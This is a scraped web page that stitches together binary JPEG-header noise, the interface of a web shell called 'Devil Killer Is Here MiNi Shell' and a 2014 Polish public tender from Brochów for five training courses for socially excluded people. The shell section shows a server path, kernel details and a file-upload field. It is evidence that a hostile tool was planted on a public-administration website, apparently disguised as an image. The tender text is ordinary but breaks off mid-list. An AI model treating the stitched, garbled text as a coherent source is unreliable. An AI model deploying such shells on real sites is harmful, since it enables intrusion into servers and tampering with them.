JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140429/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140429/92973-N-2014.html

<p class="kh_header"><b>Brochów: Usługi szkoleniowe polegające na zorganizowaniu i przeprowadzeniu kursów i szkoleń w 2014 r.  dla Uczestników Projektu systemowego pt. Re/integracja osób wykluczonych/ zagrożonych wykluczeniem społecznym na terenie gminy Brochów, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Działanie 7.1 Poddziałanie 7.1.1</b><br>
<b>Numer ogłoszenia: 92973 - 2014; data zamieszczenia: 29.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej , Brochów 125, 05-088 Brochów, woj. mazowieckie, tel. 22 725 71 82, faks 22 725 71 82.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brochow.bip.org.pl (zakładka.:Menu podmiotowe->Gminny Ośrodek Pomocy Społecznej->przetargi</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi szkoleniowe polegające na zorganizowaniu i przeprowadzeniu kursów i szkoleń w 2014 r.  dla Uczestników Projektu systemowego pt. Re/integracja osób wykluczonych/ zagrożonych wykluczeniem społecznym na terenie gminy Brochów, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Działanie 7.1 Poddziałanie 7.1.1.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie na rok 2014, któremu Zamawiający nadał nazwę Usługi szkoleniowe polegające na zorganizowaniu i przeprowadzeniu kursów i szkoleń w 2014 r.  dla Uczestników Projektu systemowego pt. Re/integracja osób wykluczonych/ zagrożonych wykluczeniem społecznym na terenie gminy Brochów, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Działanie 7.1,Poddziałanie 7.1.1, będące przedmiotem postępowania opisanego w tym dokumencie, jest trzecią częścią zamówienia zaplanowanego na lata 2012 - 2014 pod nazwą:Usługi szkoleniowe polegające na zorganizowaniu i przeprowadzeniu kursów i szkoleń w latach 2012 - 2014 dla 27 Uczestników Projektu systemowego pt. Re/integracja osób wykluczonych/zagrożonych wykluczeniem społecznym na terenie gminy Brochów, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Działanie 7.1, Poddziałanie 7.1.1.
Przedmiot tego zamówienia obejmuje zorganizowanie i przeprowadzenie 2 szkoleń: Aktywna Integracja Społeczna  i  Aktywna Integracja Zawodowa oraz 3 kursów: Układanie kostki brukowej, Kierowca wózków jezdniowych z napędem silnikowym, w tym bezpieczna wymiana butli i Florystyka. Zakres działań składających się na usługę Kącik kawowy oraz na zorganizowanie i na przeprowadzenie szkoleń/ kursów został szczegółowo zdefiniowany  w SIWZ, w  punkcie Znaczenie terminów użytych w SIWZ Zamawiający podzielił trzecią część zamówienia, to jest zamówienie na rok 2014, na 5 odrębnych zadań  - części. Zorganizowanie i przeprowadzenie każdego z wyżej wymienionych kursów i szkoleń stanowi odrębne zadanie - odrębną część zamówienia dla Wykonawcy. 
Nazwy poszczególnych zadań - części zamówienia są następujące:Zadanie 1, część 1 -  Zorganizowanie i przeprowadzenie szkolenia Aktywna Integracja Społeczna. 
Zadanie 2, część 2 - Zorganizowanie i przeprowadzenie szkolenia Aktywna Integracja Zawodowa.Zadanie 3, część 3 - Zorganizowanie i przeprowadzenie kursu Układanie kostki brukowej. Zadanie 4, część 4 - Zorganizowanie i przeprowadzenie kursu Kierowca wózków jezdniowych z napędem silnikowym, w tym bezpieczna wymiana butli.Zadanie 5, część 5 - Zorganizowanie i przeprowadzenie kursu Florystyka.
Planowana liczba Uczestników Projektu: w szkoleniu Aktywna Integracja Społeczna -  12 osób, w szkoleniu Aktywna Integracja Zawodowa - 16 osób,  w kursie Układanie kostki brukowej-  8 osób, w kursie  Kierowca wózków jezdniowych z napędem silnikowym - 12 osób, w kursie Florystyka- 10 osób. 
Ilości osób uczestniczących w poszczególnych szkoleniach/ kursach, wskazane w tym dokumencie oraz w SIWZ i w załącznikach do SIWZ są wielkościami orientacyjnymi, przyjętymi dla celu porównania ofert i wyboru najkorzystniejszej oferty. Wykonawcy, z którym Zamawiający podpisze umowę nie przysługuje roszczenie o realizację usług dla w/w liczby osób.Zamawiający zastrzega sobie prawo do zmiany ilości osób biorących udział w w/w kursach/szkoleniach w zależności od bieżących potrzeb, z tym że zmniejszenie i/lub zwiększenie ilości uczestników poszczególnych szkoleń/ kursów dopuszczalne jest w zakresie nie większym, niż o dwie osoby.W całym okresie obowiązywania umowy Wykonawca jest zobowiązany do zachowania - co do każdej pozycji - ceny jednostkowej zaoferowanej w tym postępowaniu. Wymagany przez Zamawiającego czas trwania w/w szkoleń/kursów przedstawia się następująco:a) Wymagany czas trwania szkolenia Aktywna Integracja Społeczna dla grupy liczącej 12 osób wynosi: ogółem 41 godzin, w tym: 29 godzin grupowych dla całej grupy i 12 godzin indywidualnych, prowadzonych oddzielnie z każdym Uczestnikiem Projektu - to jest razem dla każdego Uczestnika Projektu po 30 godzin (czyli 29 godzin grupowych + 1 godzina indywidualna);
b) Wymagany czas trwania szkolenia Aktywna Integracja Zawodowa dla grupy liczącej 16 osób wynosi: ogółem 45 godzin, w tym: 29 godzin grupowych dla całej grupy i 16 godzin indywidualnych, prowadzonych oddzielnie z każdym Uczestnikiem Projektu - to jest razem dla każdego Uczestnika Projektu po 30 godzin (czyli 29 godzin grupowych + 1 godzina indywidualna);
c) Wymagany czas trwania kursu Układanie kostki brukowej wynosi 90 godzin dla każdego Uczestnika Projektu, a ogólny czas trwania kursu musi być zgodny z odnośnymi przepisami; 
d) Wymagany czas trwania kursu  Kierowca wózków jezdniowych z napędem silnikowym (w tym bezpieczna wymiana butli) wynosi 67 godzin dla każdego Uczestnika Projektu, a ogólny czas trwania kursu musi być zgodny z odnośnymi przepisami;
e) Wymagany czas trwania kursu Florystyka wynosi 90 godzin dla każdego Uczestnika Projektu, a ogólny czas trwania kursu musi być zgodny z odnośnymi przepisami
Jedna godzina szkolenia/ kursu oznacza 1 godzinę dydaktyczną, trwającą 45 minut.
Wszystkie zadania są współfinansowane przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Działanie 7.1, Poddziałanie 7.1.1. 
Zamawiający w tym postępowaniu udzieli zamówienia  na zorganizowanie i przeprowadzenie w/w usług  szkoleniowych razem z usługą Kącik kawowy. 
Wykonawcy składający oferty są proszeni o wyliczenie kosztów usług szkoleniowych razem z usługą kącik kawowy do poszczególnych szkoleń..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.57.00.00-0, 85.31.23.20-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający żąda złożenia oświadczenia na podstawie art. 22 ust. 1 ustawy  wg zał. Nr 2 do SIWZ i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ww. warunek za spełniony jeżeli Wykonawca wykaże że w okresie ostatnich trzech lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), w sposób należyty zorganizował i przeprowadził - w przypadku złożenia oferty na realizację: 
- zadania 1 o nazwie: Zorganizowanie i przeprowadzenie szkolenia Aktywna Integracja Społeczna - dla nie mniej niż 1  grupy osób dorosłych liczącej nie mniej niż 8 osób nie mniej niż 1 szkolenie Aktywna Integracja Społeczna lub nie mniej niż 1 inne szkolenie o podobnym zakresie tematycznym, o wartości nie mniejszej niż 2 350,00 złotych brutto.
zadania 2 o nazwie: Zorganizowanie i przeprowadzenie szkolenia Aktywna Integracja Zawodowa - dla nie mniej niż 1  grupy osób dorosłych liczącej nie mniej niż 11 osób - nie mniej niż 1 szkolenie Aktywna Integracja Zawodowa lub nie mniej niż 1 inne szkolenie o podobnym zakresie tematycznym, o wartości nie mniejszej niż 2 350,00 złotych brutto.
zadania 3 o nazwie: Zorganizowanie i przeprowadzenie kursu Układanie kostki brukowej- dla nie mniej niż 1  grupy osób dorosłych liczącej nie mniej niż 5 osób - nie mniej niż 1 kurs Układanie kostki brukowej  lub nie mniej niż 1 inny kurs o podobnym zakresie tematycznym, o wartości nie mniejszej niż 5 500,00 złotych brutto.
zadania 4 o nazwie: Zorganizowanie i przeprowadzenie kursu Kierowca wózków jezdniowych z napędem silnikowym (w tym bezpieczna wymiana butli) - dla nie mniej niż 1  grupy osób dorosłych liczącej nie mniej niż 8 osób nie mniej niż 1 kurs Kierowca wózków jezdniowych z napędem silnikowym lub nie mniej niż 1 inny kurs o podobnym zakresie tematycznym, o wartości nie mniejszej niż 6 500,00 złotych brutto.
zadania 5 o nazwie: Zorganizowanie i przeprowadzenie kursu Florystyka - dla nie mniej niż 1  grupy osób dorosłych liczącej nie mniej niż 7 osób - nie mniej niż 1 kurs Florystyka  lub nie mniej niż 1 inny kurs o podobnym zakresie tematycznym, o wartości nie mniejszej niż 6 500,00 złotych brutto.
Opis sposobu dokonywania oceny spełniania tego warunku
Spełnianie warunku w odniesieniu do części 1, 2, 3, 4 i 5  zamówienia zostanie ocenione na podstawie złożonego z ofertą  wypełnionego załącznika nr 6 do SIWZ,  na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ww. warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował w czasie wykonywania zamówienia polegającego na realizacji:zadania 1 o nazwie: Zorganizowanie i przeprowadzenie szkolenia Aktywna Integracja Społeczna:tablicą stojącą flip-chart z blokiem do pisania lub inną, przyborami do pisania na tablicy, komputerem przenośnym -notebookiem, projektorem i/lub rzutnikiem, filmami edukacyjnymi dotyczącymi tematyki zajęć, listwami i przedłużaczami do podłączenia komputera i pozostałego sprzętu, czajnikiem elektrycznym i naczyniami jednorazowego użytku:szklankami, łyżeczkami, i talerzykami.                               
zadania 2 o nazwie: Zorganizowanie i przeprowadzenie szkolenia Aktywna Integracja Zawodowa: tablicą stojącą flip-chart z blokiem do pisania lub inną, przyborami do pisania na tablicy, komputerem przenośnym -notebookiem,  projektorem i/lub rzutnikiem, filmami edukacyjnymi dotyczącymi tematyki zajęć, listwami i przedłużaczami do podłączenia komputera i innego sprzętu, czajnikiem elektrycznym i naczyniami jednorazowego użytku:szklankami, łyżeczkami, i talerzykami.
zadania 3 o nazwie: Zorganizowanie i przeprowadzenie kursu Układanie kostki brukowej 
a. tablicą stojącą (flip-chart z blokiem do pisania lub inną), przyborami do pisania na tablicy, komputerem przenośnym (notebookiem),  projektorem i/lub rzutnikiem, ekranem, filmami edukacyjnymi dotyczącymi tematyki prowadzonego kursu, listwami i przedłużaczem do podłączenia komputera i pozostałego sprzętu.
b. Narzędziami, maszynami i sprzętem do układania kostki brukowej na dużych i małych powierzchniach np: wibratorem powierzchniowym, równiarką, kultywatorem lub glebogryzarką, listwą zgarniająca i profilującą, kołem pomiarowym, przymiarem do odwzorowywania, łatą profilującą, w tym automatyczną, wózkiem brukarskim, płytą wibracyjną, gilotyną i/lub szlifierką z tarczą do betonu, zagęszczarką, mieszalnikiem, chwytakiem, imakiem, wyważakiem, wyciągaczem, młotkami. 
c. kostką brukową - klasa 3 D i 2 B, kompletem pozostałych materiałów potrzebnych do ułożenia kostki, m.in.: cementem,  żwirem, piaskiem, tłuczniem lub grysem, krawężnikami, korytkami, impregnatem do kostki.
d. środkiem/środkami transportu do przewozu Uczestników kursu na zajęcia praktyczne - z zakresu układania kostki brukowej na dużych powierzchniach.
e. czajnikiem elektrycznym i naczyniami jednorazowego użytku, szklankami, łyżeczkami, i talerzykami.
4) zadania 4 o nazwie: Zorganizowanie i przeprowadzenie kursu Kierowca wózków jezdniowych z napędem silnikowym, w tym bezpieczna wymiana butli:
a) tablicą stojącą flip-chart z blokiem do pisania lub inną, przyborami do pisania na tablicy, komputerem przenośnym -notebookiem,  projektorem i/lub rzutnikiem, ekranem, filmami edukacyjnymi dotyczącymi tematyki kursu, listwami i przedłużaczami do podłączenia komputera i pozostałego sprzętu, czajnikiem elektrycznym i naczyniami jednorazowego użytku:szklankami, łyżeczkami, i talerzykami.
b) bazą dydaktyczną do zajęć praktycznych, to jest placem manewrowym oraz co najmniej jednym wózkiem jezdniowym.
c) środkiem/środkami transportu do przewozu osób w celu dowozu Uczestników Projektu na zajęcia teoretyczne.
zadania 5 o nazwie: Zorganizowanie i przeprowadzenie kursu Florystyka - 
a) tablicą stojącą flip-chart z blokiem do pisania lub inną, przyborami do pisania na tablicy, komputerem przenośnym -notebookiem, projektorem i/lub rzutnikiem, ekranem, filmami edukacyjnymi dotyczącymi tematyki prowadzonego kursu, listwami i przedłużaczami do podłączenia komputera i pozostałego sprzętu.
b) podstawowymi narzędziami, sprzętem i akcesoriami do wykorzystania przy tworzeniu aranżacji florystycznych:stojakiem-statywem florystycznym, sekatorem, nożem florystycznym, nożyczkami, przycinakiem do drutu, pistoletem do kleju, piłką do drewna, piłką do metalu, szczypcami płaskimi, wiertarką, motkiem, obcęgami, kolcownikiem, drutami florystycznymi, klejem na zimno, sylikonowymi laskami, taśmami kauczukowymi, plastelinowymi, dwustronnie klejącymi;
- różnymi kwiatami i materiałami organicznymi /kordyliną, salalem, trawą niedźwiedzią, aralią/ oraz rafią, sznurkiem sizalowym, rattanem /w krążku, w kuli/, siatką tiulową, taśmami florystycznymi, folią i papierem dekoracyjnym, farbami w sprayu, brokatem, nabłyszczaczami, naczyniami ozdobnymi, floretami, gąbkami florystycznymi, taśmami samozaciskowymi do prowadzenia roślin, kratkami do aranżacji bukietów.
c) Czajnikiem elektrycznym i naczyniami jednorazowego użytku /szklankami, łyżeczkami, i talerzykami/.
Spełnienie warunku w odniesieniu do części 1, 2, 3, 4 i 5 zamówienia zostanie ocenione na podstawie złożonych, wypełnionych załączników nr 8.1, 8.2, 8.3, 8.4, 8.5 do SIWZ na zasadzie spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ww. warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował w czasie wykonywania zamówienia osobami, które mają odpowiednie kwalifikacje i doświadczenie - w odniesieniu do realizacji poszczególnych części zamówienia.
W  przypadku złożenia oferty na realizację zadania 1 o nazwie: Zorganizowanie i przeprowadzenie szkolenia Aktywna Integracja Społeczna, osoby prowadzące szkolenie muszą spełniać poniższe wymagania: mieć wykształcenie wyższe na kierunku psychologia. mieć doświadczenie w prowadzeniu dla nie mniej niż 1 grupy osób dorosłych, liczącej nie mniej, niż 8 osób, w ciągu ostatnich 3 lat przed upływem terminu składania ofert /a jeżeli okres pracy zawodowej kadry jest krótszy -  w tym okresie/, nie mniej niż jednego szkolenia o takiej samej lub podobnej nazwie i o takim samym lub podobnym zakresie tematycznym.
W  przypadku złożenia oferty na realizację zadania 2 o nazwie: Zorganizowanie i przeprowadzenie szkolenia Aktywna Integracja Zawodowa  osoby prowadzące szkolenie muszą spełniać poniższe wymagania:mieć wykształcenie wyższe o specjalności doradca zawodowy. mieć doświadczenie w prowadzeniu dla nie mniej niż 1 grupy osób dorosłych, liczącej nie mniej niż 11 osób, w ciągu ostatnich 3 lat przed upływem terminu składania ofert /a jeżeli okres ich pracy zawodowej jest krótszy -  w tym okresie/ nie mniej jednego szkolenia o takiej samej lub podobnej nazwie i o takim samym lub podobnym zakresie tematycznym.
W  przypadku złożenia oferty na realizację zadania 3 o nazwie:Zorganizowanie i przeprowadzenie kursu Układanie kostki brukowej, osoby prowadzące szkolenie muszą spełniać poniższe wymagania: mieć kwalifikacje zawodowe odpowiednie do rodzaju kształcenia, zgodnie z § 19 ust.2 rozporządzenia Ministra Edukacji Narodowej z dnia 11 stycznia 2012 roku w sprawie kształcenia ustawicznego w formach pozaszkolnych /Dz. U. z 2012 r., poz.186/,  mieć doświadczenie w prowadzeniu dla nie mniej niż 1 grupy osób dorosłych,  liczącej nie mniej, niż 5 osób, w ciągu ostatnich 3 lat przed upływem terminu składania ofert /a jeżeli okres pracy zawodowej kadry jest krótszy -  w tym okresie/, nie mniej niż jednego kursu o takiej samej lub podobnej nazwie i o takim samym lub podobnym zakresie tematycznym.
W  przypadku złożenia oferty na realizację zadania 4 o nazwie: Zorganizowanie i przeprowadzenie kursu Kierowca wózków jezdniowych z napędem silnikowym /w tym bezpieczna wymiana butli/, osoby prowadzące szkolenie muszą spełniać poniższe wymagania:  mieć wykształcenie co najmniej średnie i ukończone odpowiednie kursy specjalistyczne dające kwalifikacje do prowadzenia kursu Operator wózków jezdniowych z napędem silnikowym lub kierowca wózków jezdniowych z napędem silnikowym i posiadającą uprawnienia operatora /lub kierowcy/ wózków jezdniowych z napędem silnikowym, mieć doświadczenie w prowadzeniu nie mniej niż 1 kursu Operator lub kierowca wózków jezdniowych lub innego kursu o podobnym zakresie tematycznym dla nie mniej niż 1 grupy osób dorosłych liczącej nie mniej, niż 8 osób, w ciągu ostatnich 3 lat przed upływem terminu składania ofert /a jeżeli okres pracy zawodowej kadry jest krótszy -  w tym okresie/.
W  przypadku złożenia oferty na realizację zadania 5 o nazwie: Zorganizowanie i przeprowadzenie kursu Florystyka, osoby prowadzące szkolenie muszą spełniać poniższe wymagania:  mieć kwalifikacje zawodowe odpowiednie do rodzaju kształcenia, zgodnie z § 19 ust.2 rozporządzenia Ministra Edukacji Narodowej z dnia 11 stycznia 2012 roku w sprawie kształcenia ustawicznego w formach pozaszkolnych /Dz. U. z 2012 r., poz.186/, mieć doświadczenie w prowadzeniu dla nie mniej niż 1 grupy osób dorosłych, liczącej nie mniej niż 7 osób, w ciągu ostatnich 3 lat przed upływem terminu składania ofert /a jeżeli okres pracy zawodowej kadry jest krótszy -  w tym okresie/, nie mniej niż jednego kursu o takiej samej lub podobnej nazwie i o takim samym lub podobnym zakresie tematycznym.
Spełnienie warunku w odniesieniu do części 1, 2, 3, 4 i 5 zamówienia zostanie ocenione na podstawie złożonego, wypełnionego załącznika nr 7 i nr 7.1 do SIWZ na zasadzie spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający żąda złożenia oświadczenia na podstawie art. 22 ust. 1 ustawy - wg zał. Nr 2 do SIWZ i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zamawiający żąda wykazania w wymaganym zakresie usług takich samych lub podobnych, zbliżonych do przedmiotu zamówienia, potwierdzających wykazanie spełnienia warunku wiedzy i doświadczenia.;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
